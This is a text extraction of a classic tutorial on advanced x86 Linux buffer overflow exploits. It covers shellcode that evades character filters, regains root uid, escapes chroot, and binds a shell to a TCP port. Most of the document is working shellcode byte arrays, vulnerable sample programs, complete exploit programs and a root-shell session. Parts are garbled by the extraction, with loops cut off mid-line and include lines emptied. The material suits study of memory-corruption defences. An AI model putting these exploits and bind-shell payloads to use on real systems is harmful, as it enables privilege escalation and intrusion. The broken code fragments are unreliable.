advanced buffer overflow exploits

8/14/2019 Advanced Buffer Overflow Exploits

1/25

Advanced buffer overflow exploits

Written by Taeho Oh ( [email protected] )----------------------------------------------------------------------------Taeho Oh ( [email protected] ) http://postech.edu/~ohharaPLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plusPosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug

----------------------------------------------------------------------------

1. IntroductionNowadays there are many buffer overflow exploit codes. The early bufferoverflow exploit codes only spawn a shell ( execute /bin/sh ). However,nowadays some of the buffer overflow exploit codes have very nice features.For example, passing through filtering, opening a socket, breaking chroot,and so on. This paper will attempt to explain the advanced buffer overflowexploit skill under intel x86 linux.

2. What do you have to know before reading?You have to know assembly language, C language, and Linux. Of course, you

have to know what buffer overflow is. You can get the information of thebuffer overflow in phrack 49-14 ( Smashing The Stack For Fun And Profitby Aleph1 ). It is a wonderful paper of buffer overflow and I highly recommendyou to read that before reading this one.

3. Pass through filteringThere are many programs which has buffer overflow problems. Why are not theall buffer overflow problems exploited? Because even if a program has a bufferoverflow condition, it can be hard to exploit. In many cases, the reason isthat the program filters some characters or converts characters into othercharacters. If the program filters all non printable characters, it's toohard to exploit. If the program filters some of characters, you can passthrough the filter by making good buffer overflow exploit code. :)

3.1 The example vulnerable program

vulnerable1.c----------------------------------------------------------------------------#include#include

int main(int argc,int **argv){

char buffer[1024];int i;if(argc>1)

{for(i=0;i


2/25

"/bin/sh" which must contain small letters. However, you can exploit this. :)

3.2 Modify the normal shellcodeAlmost all buffer overflow exploit code uses this shellcode. Now you haveto remove all small letters in the shellcode. Of course, the new shellcodehas to execute a shell.

normal shellcode

----------------------------------------------------------------------------char shellcode[]=

"\xeb\x1f" /* jmp 0x1f */"\x5e" /* popl %esi */"\x89\x76\x08" /* movl %esi,0x8(%esi) */"\x31\xc0" /* xorl %eax,%eax */"\x88\x46\x07" /* movb %eax,0x7(%esi) */"\x89\x46\x0c" /* movl %eax,0xc(%esi) */"\xb0\x0b" /* movb $0xb,%al */"\x89\xf3" /* movl %esi,%ebx */"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */"\xcd\x80" /* int $0x80 */

"\x31\xdb" /* xorl %ebx,%ebx */"\x89\xd8" /* movl %ebx,%eax */"\x40" /* inc %eax */"\xcd\x80" /* int $0x80 */"\xe8\xdc\xff\xff\xff" /* call -0x24 */"/bin/sh"; /* .string \"/bin/sh\" */

----------------------------------------------------------------------------

This shellcode has 6 small letters. ( 5 small letters in the "/bin/sh" and1 small letter in "movl %esi,0x8(%esi)" )You cannot use "/bin/sh" character string directly to pass through thefilter. However, you can insert any characters except for small characters.Therefore, you can insert "\x2f\x12\x19\x1e\x2f\x23\x18" instead of

"\x2f\x62\x69\x6e\x2f\x73\x68" ( "/bin/sh" ). After you overflow the buffer, you have to change "\x2f\x12\x19\x1e\x2f\x23\x18" into"\x2f\x62\x69\x6e\x2f\x73\x68" to execute "/bin/sh". You can change easilyby adding \x50 to \x62, \x69, \x6e, \x73, and \x68 when your shellcodeis executed. Then how can you hide \x76 in "movl %esi,0x8(%esi)" ? Youcan change "movl %esi,0x8(%esi)" into other instructions that do the equivalentinstruction and do not contain any small letters. For example,"movl %esi,0x8(%esi)" can be changed into "movl %esi,%eax", "addl $0x8,%eax","movl %eax,0x8(%esi)". The changed instructions have any small letters.( I think other good instructions to do same thing. It's just an example. )Now the new shellcode is made.

new shellcode

----------------------------------------------------------------------------char shellcode[]=

"\xeb\x38" /* jmp 0x38 */"\x5e" /* popl %esi */"\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */"\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */"\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */"\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */"\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */"\x89\xf0" /* movl %esi,%eax */"\x83\xc0\x08" /* addl $0x8,%eax */


3/25


4/25

/* /bin/sh is disguised */

unsigned long get_sp(void){

__asm__("movl %esp,%eax");}

main(int argc,char **argv)

{char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;long addr;unsigned long sp;int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;int i;

if(argc>1)offset=atoi(argv[1]);

sp=get_sp();addr=sp-offset;

for(i=0;i>8;buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;buff[i+ALIGN+3]=(addr&0xff000000)>>24;

}

for(i=0;i


5/25

----------------------------------------------------------------------------

3.4 What can you do with this technique?You can pass through various form filters with this technique. When thevulnerable program filter !@#$%^&*(), you can make the new shellcode whichdoesn't contain !@#$%^&*(). However, you will have difficulties in making ashellcode, if the program filters many characters.

4 Change uid back to 0The setuid root program which knows that work with root permission is verydangerous calls seteuid(getuid()) at start. And it calls seteuid(0) when it isneeded. Many programmer thinks that it's safe after calling seteuid(getuid()).However, it's not true. The uid can be back to 0.


vulnerable2.c----------------------------------------------------------------------------#include#include

int main(int argc,char **argv){

char buffer[1024];seteuid(getuid());if(argc>1)

strcpy(buffer,argv[1]);}----------------------------------------------------------------------------

This vulnerable program calls seteuid(getuid()) at start. Therefore, youmay think that "strcpy(buffer,argv[1]);" is OK. Because you can only getyour own shell although you succeed in buffer overflow attack. However,if you insert a code which calls setuid(0) in the shellcode, you can get

root shell. :)

4.2 Make setuid(0) code

setuidasm.c----------------------------------------------------------------------------main(){

setuid(0);}----------------------------------------------------------------------------

compile and disassemble

----------------------------------------------------------------------------[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c[ ohhara@ohhara ~ ] {2} $ gdb setuidasmGNU gdb 4.17Copyright 1998 Free Software Foundation, Inc.GDB is free software, covered by the GNU General Public License, and you arewelcome to change it and/or distribute copies of it under certain conditions.Type "show copying" to see the conditions.There is absolutely no warranty for GDB. Type "show warranty" for details.This GDB was configured as "i386-redhat-linux"...(gdb) disassemble setuid


6/25

Dump of assembler code for function __setuid:0x804ca00 : movl %ebx,%edx0x804ca02 : movl 0x4(%esp,1),%ebx0x804ca06 : movl $0x17,%eax0x804ca0b : int $0x800x804ca0d : movl %edx,%ebx0x804ca0f : cmpl $0xfffff001,%eax0x804ca14 : jae 0x804cc10

0x804ca1a : ret0x804ca1b : nop0x804ca1c : nop0x804ca1d : nop0x804ca1e : nop0x804ca1f : nopEnd of assembler dump.(gdb)----------------------------------------------------------------------------

setuid(0); code----------------------------------------------------------------------------char code[]=

"\x31\xc0" /* xorl %eax,%eax */"\x31\xdb" /* xorl %ebx,%ebx */"\xb0\x17" /* movb $0x17,%al */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

4.3 Modify the normal shellcode

Making new shellcode is very easy if you make setuid(0) code. Just insertthe code into the start of the normal shellcode.

new shellcode----------------------------------------------------------------------------

char shellcode[]="\x31\xc0" /* xorl %eax,%eax */"\x31\xdb" /* xorl %ebx,%ebx */"\xb0\x17" /* movb $0x17,%al */"\xcd\x80" /* int $0x80 */"\xeb\x1f" /* jmp 0x1f */"\x5e" /* popl %esi */"\x89\x76\x08" /* movl %esi,0x8(%esi) */"\x31\xc0" /* xorl %eax,%eax */"\x88\x46\x07" /* movb %eax,0x7(%esi) */"\x89\x46\x0c" /* movl %eax,0xc(%esi) */"\xb0\x0b" /* movb $0xb,%al */"\x89\xf3" /* movl %esi,%ebx */

"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */"\xcd\x80" /* int $0x80 */"\x31\xdb" /* xorl %ebx,%ebx */"\x89\xd8" /* movl %ebx,%eax */"\x40" /* inc %eax */"\xcd\x80" /* int $0x80 */"\xe8\xdc\xff\xff\xff" /* call -0x24 */"/bin/sh"; /* .string \"/bin/sh\" */

----------------------------------------------------------------------------


7/25

4.4 Exploit vulnerable2 program

With this shellcode, you can make an exploit code easily.

exploit2.c----------------------------------------------------------------------------#include#include

#define ALIGN 0#define OFFSET 0#define RET_POSITION 1024#define RANGE 20#define NOP 0x90

char shellcode[]="\x31\xc0" /* xorl %eax,%eax */"\x31\xdb" /* xorl %ebx,%ebx */"\xb0\x17" /* movb $0x17,%al */"\xcd\x80" /* int $0x80 */"\xeb\x1f" /* jmp 0x1f */

"\x5e" /* popl %esi */"\x89\x76\x08" /* movl %esi,0x8(%esi) */"\x31\xc0" /* xorl %eax,%eax */"\x88\x46\x07" /* movb %eax,0x7(%esi) */"\x89\x46\x0c" /* movl %eax,0xc(%esi) */"\xb0\x0b" /* movb $0xb,%al */"\x89\xf3" /* movl %esi,%ebx */"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */"\xcd\x80" /* int $0x80 */"\x31\xdb" /* xorl %ebx,%ebx */"\x89\xd8" /* movl %ebx,%eax */"\x40" /* inc %eax */

"\xcd\x80" /* int $0x80 */"\xe8\xdc\xff\xff\xff" /* call -0x24 */"/bin/sh"; /* .string \"/bin/sh\" */



void main(int argc,char **argv){

char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;long addr;

unsigned long sp;int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;int i;



for(i=0;i


8/25

{buff[i+ALIGN]=(addr&0x000000ff);buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;buff[i+ALIGN+3]=(addr&0xff000000)>>24;

}

for(i=0;i


9/25

chdir("/");if(argc>1)

strcpy(buffer,argv[1]);}----------------------------------------------------------------------------

If you tries to execute "/bin/sh" with buffer overflow, it may executes"/home/ftp/bin/sh" ( if it exists ) and you cannot access the other directories

except for "/home/ftp".

5.2 Make break chroot codeIf you can execute below code, you can break chroot.

breakchrootasm.c----------------------------------------------------------------------------main(){

mkdir("sh",0755);chroot("sh");/* many "../" */chroot("../../../../../../../../../../../../../../../../");

}----------------------------------------------------------------------------

This break chroot code makes "sh" directory, because it's easy to reference.( it's also used to execute "/bin/sh" )

compile and disassemble----------------------------------------------------------------------------[ ohhara@ohhara ~ ] {1} $ gcc -o breakchrootasm -static breakchrootasm.c[ ohhara@ohhara ~ ] {2} $ gdb breakchrootasmGNU gdb 4.17Copyright 1998 Free Software Foundation, Inc.GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.Type "show copying" to see the conditions.There is absolutely no warranty for GDB. Type "show warranty" for details.This GDB was configured as "i386-redhat-linux"...(gdb) disassemble mkdirDump of assembler code for function __mkdir:0x804cac0 : movl %ebx,%edx0x804cac2 : movl 0x8(%esp,1),%ecx0x804cac6 : movl 0x4(%esp,1),%ebx0x804caca : movl $0x27,%eax0x804cacf : int $0x800x804cad1 : movl %edx,%ebx0x804cad3 : cmpl $0xfffff001,%eax

0x804cad8 : jae 0x804cc40 0x804cade : ret0x804cadf : nopEnd of assembler dump.(gdb) disassemble chrootDump of assembler code for function chroot:0x804cb60 : movl %ebx,%edx0x804cb62 : movl 0x4(%esp,1),%ebx0x804cb66 : movl $0x3d,%eax0x804cb6b : int $0x800x804cb6d : movl %edx,%ebx


10/25

0x804cb6f : cmpl $0xfffff001,%eax0x804cb74 : jae 0x804cc40 0x804cb7a : ret0x804cb7b : nop0x804cb7c : nop0x804cb7d : nop0x804cb7e : nop0x804cb7f : nop

End of assembler dump.(gdb)----------------------------------------------------------------------------

mkdir("sh",0755); code----------------------------------------------------------------------------

/* mkdir first argument is %ebx and second argument is *//* %ecx. */

char code[]="\x31\xc0" /* xorl %eax,%eax */"\x31\xc9" /* xorl %ecx,%ecx */"\xb0\x17" /* movb $0x27,%al */"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */

/* %esi has to reference "/bin/sh" before using this *//* instruction. This instruction load address of "sh" *//* and store at %ebx */"\xfe\xc5" /* incb %ch *//* %cx = 0000 0001 0000 0000 */"\xb0\x3d" /* movb $0xed,%cl *//* %cx = 0000 0001 1110 1101 *//* %cx = 000 111 101 101 *//* %cx = 0 7 5 5 */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

chroot("sh"); code

----------------------------------------------------------------------------/* chroot first argument is ebx */

char code[]="\x31\xc0" /* xorl %eax,%eax */"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */"\xb0\x3d" /* movb $0x3d,%al */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

chroot("../../../../../../../../../../../../../../../../"); code----------------------------------------------------------------------------char code[]=

"\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */

/* disguised "../" character string */"\xf7\xdb" /* negl %ebx *//* %ebx = $0x002f2e2e *//* intel x86 is little endian. *//* %ebx = "../" */"\x31\xc9" /* xorl %ecx,%ecx */"\xb1\x10" /* movb $0x10,%cl *//* prepare for looping 16 times. */"\x56" /* pushl %esi *//* backup current %esi. %esi has the pointer of *//* "/bin/sh". */


11/25

"\x01\xce" /* addl %ecx,%esi */"\x89\x1e" /* movl %ebx,(%esi) */"\x83\xc6\x03" /* addl $0x3,%esi */"\xe0\xf9" /* loopne -0x7 *//* make "../../../../ . . . " character string at *//* 0x10(%esi) by looping. */"\x5e" /* popl %esi *//* restore %esi. */

"\xb0\x3d" /* movb $0x3d,%al */"\x8d\x5e\x10" /* leal 0x10(%esi),%ebx *//* %ebx has the address of "../../../../ . . . ". */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------


Making new shellcode is very easy if you make break chroot code. Just insertthe code into the start of the normal shellcode and modify jmp and callargument.

new shellcode

----------------------------------------------------------------------------char shellcode[]=

"\xeb\x4f" /* jmp 0x4f */"\x31\xc0" /* xorl %eax,%eax */"\x31\xc9" /* xorl %ecx,%ecx */"\x5e" /* popl %esi */"\x88\x46\x07" /* movb %al,0x7(%esi) */"\xb0\x27" /* movb $0x27,%al */"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */"\xfe\xc5" /* incb %ch */"\xb1\xed" /* movb $0xed,%cl */"\xcd\x80" /* int $0x80 */"\x31\xc0" /* xorl %eax,%eax */

"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */"\xb0\x3d" /* movb $0x3d,%al */"\xcd\x80" /* int $0x80 */"\x31\xc0" /* xorl %eax,%eax */"\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */"\xf7\xdb" /* negl %ebx */"\x31\xc9" /* xorl %ecx,%ecx */"\xb1\x10" /* movb $0x10,%cl */"\x56" /* pushl %esi */"\x01\xce" /* addl %ecx,%esi */"\x89\x1e" /* movl %ebx,(%esi) */"\x83\xc6\x03" /* addl %0x3,%esi */"\xe0\xf9" /* loopne -0x7 */

"\x5e" /* popl %esi */"\xb0\x3d" /* movb $0x3d,%al */"\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */"\xcd\x80" /* int $0x80 */"\x31\xc0" /* xorl %eax,%eax */"\x89\x76\x08" /* movl %esi,0x8(%esi) */"\x89\x46\x0c" /* movl %eax,0xc(%esi) */"\xb0\x0b" /* movb $0xb,%al */"\x89\xf3" /* movl %esi,%ebx */"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */


12/25

"\xcd\x80" /* int $0x80 */"\xe8\xac\xff\xff\xff" /* call -0x54 */"/bin/sh"; /* .string \"/bin/sh\" */

----------------------------------------------------------------------------

5.4 Exploit vulnerable3 programWith this shellcode, you can make an exploit code easily.

exploit3.c----------------------------------------------------------------------------#include#include

#define ALIGN 0#define OFFSET 0#define RET_POSITION 1024#define RANGE 20#define NOP 0x90

char shellcode[]="\xeb\x4f" /* jmp 0x4f */

"\x31\xc0" /* xorl %eax,%eax */"\x31\xc9" /* xorl %ecx,%ecx */"\x5e" /* popl %esi */"\x88\x46\x07" /* movb %al,0x7(%esi) */"\xb0\x27" /* movb $0x27,%al */"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */"\xfe\xc5" /* incb %ch */"\xb1\xed" /* movb $0xed,%cl */"\xcd\x80" /* int $0x80 */"\x31\xc0" /* xorl %eax,%eax */"\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */"\xb0\x3d" /* movb $0x3d,%al */"\xcd\x80" /* int $0x80 */

"\x31\xc0" /* xorl %eax,%eax */"\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */"\xf7\xdb" /* negl %ebx */"\x31\xc9" /* xorl %ecx,%ecx */"\xb1\x10" /* movb $0x10,%cl */"\x56" /* pushl %esi */"\x01\xce" /* addl %ecx,%esi */"\x89\x1e" /* movl %ebx,(%esi) */"\x83\xc6\x03" /* addl %0x3,%esi */"\xe0\xf9" /* loopne -0x7 */"\x5e" /* popl %esi */"\xb0\x3d" /* movb $0x3d,%al */"\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */

"\xcd\x80" /* int $0x80 */"\x31\xc0" /* xorl %eax,%eax */"\x89\x76\x08" /* movl %esi,0x8(%esi) */"\x89\x46\x0c" /* movl %eax,0xc(%esi) */"\xb0\x0b" /* movb $0xb,%al */"\x89\xf3" /* movl %esi,%ebx */"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */"\xcd\x80" /* int $0x80 */"\xe8\xac\xff\xff\xff" /* call -0x54 */"/bin/sh"; /* .string \"/bin/sh\" */


13/25



void main(int argc,char **argv){

char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;long addr;unsigned long sp;int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;int i;




}

for(i=0;i


14/25

rootbash# pwd/home/ftpbash# cd /bash# pwd/bash# lsafs boot etc home lost+found mnt root tmp var

bin dev export lib misc proc sbin usrbash#----------------------------------------------------------------------------

5.5 What can you do with this technique?You cannot access root directory by attacking a chrooted setuid program withbuffer overflow. However, you can access all directories with this technique.6 Open socketYou can see the daemon crash if you try to overflow the buffer in a daemon.In many cases, you have to execute a shell, open a socket, and connect toyour standard I/O. If you don't, you cannot get a shell. Even if you get ashell, the server crashes immediately, so you can't command anything. In this

case, you have to make complex shellcode to connect to your standard I/O.


----------------------------------------------------------------------------#include

int main(int argc,char **argv){

char buffer[1024];if(argc>1)

strcpy(buffer,argv[1]);}

----------------------------------------------------------------------------

This is standard vulnerable program. I will use this for socket openingbuffer overflow. Because I am too lazy to make a example daemon program. :)However, after you see the code, you will not be disappointed.6.2 Make open socket codeIf you can execute below code, you can open a socket.

opensocketasm1.c----------------------------------------------------------------------------#include#include

#include

int soc,cli,soc_len;struct sockaddr_in serv_addr;struct sockaddr_in cli_addr;

int main(){

if(fork()==0){

serv_addr.sin_family=AF_INET;


15/25

serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);serv_addr.sin_port=htons(30464);soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));listen(soc,1);soc_len=sizeof(cli_addr);cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);dup2(cli,0);

dup2(cli,1);dup2(cli,2);execl("/bin/sh","sh",0);

}}----------------------------------------------------------------------------

It's difficult to make with assembly language. You can make this programsimple.

opensocketasm2.c----------------------------------------------------------------------------#include

#include#include

int soc,cli;struct sockaddr_in serv_addr;

int main(){

if(fork()==0){

serv_addr.sin_family=2;serv_addr.sin_addr.s_addr=0;serv_addr.sin_port=0x77;

soc=socket(2,1,6);bind(soc,(struct sockaddr *)&serv_addr,0x10);listen(soc,1);cli=accept(soc,0,0);dup2(cli,0);dup2(cli,1);dup2(cli,2);execl("/bin/sh","sh",0);

}}----------------------------------------------------------------------------

compile and disassemble

----------------------------------------------------------------------------[ ohhara@ohhara ~ ] {1} $ gcc -o opensocketasm2 -static opensocketasm2.c[ ohhara@ohhara ~ ] {2} $ gdb opensocketasm2GNU gdb 4.17Copyright 1998 Free Software Foundation, Inc.GDB is free software, covered by the GNU General Public License, and you arewelcome to change it and/or distribute copies of it under certain conditions.Type "show copying" to see the conditions.There is absolutely no warranty for GDB. Type "show warranty" for details.This GDB was configured as "i386-redhat-linux"...(gdb) disassemble fork


16/25

Dump of assembler code for function fork:0x804ca90 : movl $0x2,%eax0x804ca95 : int $0x800x804ca97 : cmpl $0xfffff001,%eax0x804ca9c : jae 0x804cdc0 0x804caa2 : ret0x804caa3 : nop0x804caa4 : nop

0x804caa5 : nop0x804caa6 : nop0x804caa7 : nop0x804caa8 : nop0x804caa9 : nop0x804caaa : nop0x804caab : nop0x804caac : nop0x804caad : nop0x804caae : nop0x804caaf : nopEnd of assembler dump.(gdb) disassemble socket

Dump of assembler code for function socket:0x804cda0 : movl %ebx,%edx0x804cda2 : movl $0x66,%eax0x804cda7 : movl $0x1,%ebx0x804cdac : leal 0x4(%esp,1),%ecx0x804cdb0 : int $0x800x804cdb2 : movl %edx,%ebx0x804cdb4 : cmpl $0xffffff83,%eax0x804cdb7 : jae 0x804cdc0 0x804cdbd : ret0x804cdbe : nop0x804cdbf : nopEnd of assembler dump.

(gdb) disassemble bindDump of assembler code for function bind:0x804cd60 : movl %ebx,%edx0x804cd62 : movl $0x66,%eax0x804cd67 : movl $0x2,%ebx0x804cd6c : leal 0x4(%esp,1),%ecx0x804cd70 : int $0x800x804cd72 : movl %edx,%ebx0x804cd74 : cmpl $0xffffff83,%eax0x804cd77 : jae 0x804cdc0 0x804cd7d : ret0x804cd7e : nop0x804cd7f : nop

End of assembler dump.(gdb) disassemble listenDump of assembler code for function listen:0x804cd80 : movl %ebx,%edx0x804cd82 : movl $0x66,%eax0x804cd87 : movl $0x4,%ebx0x804cd8c : leal 0x4(%esp,1),%ecx0x804cd90 : int $0x800x804cd92 : movl %edx,%ebx0x804cd94 : cmpl $0xffffff83,%eax0x804cd97 : jae 0x804cdc0


17/25

0x804cd9d : ret0x804cd9e : nop0x804cd9f : nopEnd of assembler dump.(gdb) disassemble acceptDump of assembler code for function __accept:0x804cd40 : movl %ebx,%edx0x804cd42 : movl $0x66,%eax

0x804cd47 : movl $0x5,%ebx0x804cd4c : leal 0x4(%esp,1),%ecx0x804cd50 : int $0x800x804cd52 : movl %edx,%ebx0x804cd54 : cmpl $0xffffff83,%eax0x804cd57 : jae 0x804cdc0 0x804cd5d : ret0x804cd5e : nop0x804cd5f : nopEnd of assembler dump.(gdb) disassemble dup2Dump of assembler code for function dup2:0x804cbe0 : movl %ebx,%edx

0x804cbe2 : movl 0x8(%esp,1),%ecx0x804cbe6 : movl 0x4(%esp,1),%ebx0x804cbea : movl $0x3f,%eax0x804cbef : int $0x800x804cbf1 : movl %edx,%ebx0x804cbf3 : cmpl $0xfffff001,%eax0x804cbf8 : jae 0x804cdc0 0x804cbfe : ret0x804cbff : nopEnd of assembler dump.(gdb)----------------------------------------------------------------------------

fork(); code----------------------------------------------------------------------------char code[]=

"\x31\xc0" /* xorl %eax,%eax */"\xb0\x02" /* movb $0x2,%al */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

socket(2,1,6); code----------------------------------------------------------------------------

/* %ecx is a pointer of all arguments. */char code[]=

"\x31\xc0" /* xorl %eax,%eax */

"\x31\xdb" /* xorl %ebx,%ebx */"\x89\xf1" /* movl %esi,%ecx */"\xb0\x02" /* movb $0x2,%al */"\x89\x06" /* movl %eax,(%esi) *//* The first argument. *//* %esi has reference free memory space before using *//* this instruction. */"\xb0\x01" /* movb $0x1,%al */"\x89\x46\x04" /* movl %eax,0x4(%esi) *//* The second argument. */"\xb0\x06" /* movb $0x6,%al */


18/25

"\x89\x46\x08" /* movl %eax,0x8(%esi) *//* The third argument. */"\xb0\x66" /* movb $0x66,%al */"\xb3\x01" /* movb $0x1,%bl */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

bind(soc,(struct sockaddr *)&serv_addr,0x10); code

----------------------------------------------------------------------------/* %ecx is a pointer of all arguments. */

char code[]="\x89\xf1" /* movl %esi,%ecx */"\x89\x06" /* movl %eax,(%esi) *//* %eax has to have soc value before using this *//* instruction. *//* the first argument. */"\xb0\x02" /* movb $0x2,%al */"\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) *//* serv_addr.sin_family=2 *//* 2 is stored at 0xc(%esi). */"\xb0\x77" /* movb $0x77,%al */

"\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) *//* store port number at 0xe(%esi) */"\x8d\x46\x0c" /* leal 0xc(%esi),%eax *//* %eax = the address of serv_addr */"\x89\x46\x04" /* movl %eax,0x4(%esi) *//* the second argument. */"\x31\xc0" /* xorl %eax,%eax */"\x89\x46\x10" /* movl %eax,0x10(%esi) *//* serv_addr.sin_addr.s_addr=0 *//* 0 is stored at 0x10(%esi). */"\xb0\x10" /* movb $0x10,%al */"\x89\x46\x08" /* movl %eax,0x8(%esi) *//* the third argument. */

"\xb0\x66" /* movb $0x66,%al */"\xb3\x02" /* movb $0x2,%bl */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

listen(soc,1); code----------------------------------------------------------------------------


"\x89\xf1" /* movl %esi,%ecx */"\x89\x06" /* movl %eax,(%esi) *//* %eax has to have soc value before using this *//* instruction. */

/* the first argument. */"\xb0\x01" /* movb $0x1,%al */"\x89\x46\x04" /* movl %eax,0x4(%esi) *//* the second argument. */"\xb0\x66" /* movb $0x66,%al */"\xb3\x04" /* movb $0x4,%bl */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

accept(soc,0,0); code----------------------------------------------------------------------------


19/25


"\x89\xf1" /* movl %esi,%ecx */"\x89\xf1" /* movl %eax,(%esi) *//* %eax has to have soc value before using this *//* instruction. *//* the first argument. */"\x31\xc0" /* xorl %eax,%eax */

"\x89\x46\x04" /* movl %eax,0x4(%esi) *//* the second argument. */"\x89\x46\x08" /* movl %eax,0x8(%esi) *//* the third argument. */"\xb0\x66" /* movb $0x66,%al */"\xb3\x05" /* movb $0x5,%bl */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

dup2(cli,0); code----------------------------------------------------------------------------

/* the first argument is %ebx and the second argument *//* is %ecx */

char code[]=/* %eax has to have cli value before using this *//* instruction. */"\x88\xc3" /* movb %al,%bl */"\xb0\x3f" /* movb $0x3f,%al */"\x31\xc9" /* xorl %ecx,%ecx */"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------


You need some works to merge the above codes.

new shellcode----------------------------------------------------------------------------char shellcode[]=

"\x31\xc0" /* xorl %eax,%eax */"\xb0\x02" /* movb $0x2,%al */"\xcd\x80" /* int $0x80 */"\x85\xc0" /* testl %eax,%eax */"\x75\x43" /* jne 0x43 *//* fork()!=0 case *//* It will call exit(0) *//* To do that, it will jump twice, because exit(0) is *//* located so far. */"\xeb\x43" /* jmp 0x43 */

/* fork()==0 case *//* It will call -0xa5 *//* To do that, it will jump twice, because call -0xa5 *//* is located so far. */"\x5e" /* popl %esi */"\x31\xc0" /* xorl %eax,%eax */"\x31\xdb" /* xorl %ebx,%ebx */"\x89\xf1" /* movl %esi,%ecx */"\xb0\x02" /* movb $0x2,%al */"\x89\x06" /* movl %eax,(%esi) */"\xb0\x01" /* movb $0x1,%al */


20/25

"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\xb0\x06" /* movb $0x6,%al */"\x89\x46\x08" /* movl %eax,0x8(%esi) */"\xb0\x66" /* movb $0x66,%al */"\xb3\x01" /* movb $0x1,%bl */"\xcd\x80" /* int $0x80 */"\x89\x06" /* movl %eax,(%esi) */"\xb0\x02" /* movb $0x2,%al */

"\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */"\xb0\x77" /* movb $0x77,%al */"\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */"\x8d\x46\x0c" /* leal 0xc(%esi),%eax */"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\x31\xc0" /* xorl %eax,%eax */"\x89\x46\x10" /* movl %eax,0x10(%esi) */"\xb0\x10" /* movb $0x10,%al */"\x89\x46\x08" /* movl %eax,0x8(%esi) */"\xb0\x66" /* movb $0x66,%al */"\xb3\x02" /* movb $0x2,%bl */"\xcd\x80" /* int $0x80 */"\xeb\x04" /* jmp 0x4 */

"\xeb\x55" /* jmp 0x55 */"\xeb\x5b" /* jmp 0x5b */"\xb0\x01" /* movb $0x1,%al */"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\xb0\x66" /* movb $0x66,%al */"\xb3\x04" /* movb $0x4,%bl */"\xcd\x80" /* int $0x80 */"\x31\xc0" /* xorl %eax,%eax */"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\x89\x46\x08" /* movl %eax,0x8(%esi) */"\xb0\x66" /* movb $0x66,%al */"\xb3\x05" /* movb $0x5,%bl */"\xcd\x80" /* int $0x80 */

"\x88\xc3" /* movb %al,%bl */"\xb0\x3f" /* movb $0x3f,%al */"\x31\xc9" /* xorl %ecx,%ecx */"\xcd\x80" /* int $0x80 */"\xb0\x3f" /* movb $0x3f,%al */"\xb1\x01" /* movb $0x1,%cl */"\xcd\x80" /* int $0x80 */"\xb0\x3f" /* movb $0x3f,%al */"\xb1\x02" /* movb $0x2,%cl */"\xcd\x80" /* int $0x80 */"\xb8\x2f\x62\x69\x6e" /* movl $0x6e69622f,%eax *//* %eax="/bin" */"\x89\x06" /* movl %eax,(%esi) */

